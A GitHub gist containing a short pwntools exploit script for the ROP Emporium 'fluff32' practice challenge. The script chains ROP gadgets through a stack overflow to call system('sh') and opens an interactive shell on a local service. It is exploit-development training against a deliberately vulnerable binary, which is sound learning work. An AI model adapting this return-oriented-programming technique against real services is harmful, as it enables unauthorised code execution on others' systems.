Created
April 3, 2018 09:55
-
-
Save sudhackar/7af1b13f4cc814eb3f1d51f1bc1e047b to your computer and use it in GitHub Desktop.
rop emporium fluff32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| e = ELF("./fluff32") | |
| payload = "JUNK"*11 | |
| payload += p32(0x080483e1) # : pop ebx ; ret | |
| payload += p32(e.plt['system']) | |
| payload += p32(0x08048671) # : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret | |
| payload += "JUNK" | |
| payload += p32(0x0804867b) # : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret | |
| payload += "\x00sh\x00" | |
| payload += p32(0x080488b9) # : adc al, 0x41 ; ret | |
| payload += p32(0x0804856c) # : sub esp, 0x14 ; push eax ; call edx | |
| payload += "JUNK" | |
| s = remote("127.0.0.1", 5000) | |
| raw_input() | |
| s.recvuntil("> ") | |
| s.sendline(payload) | |
| s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment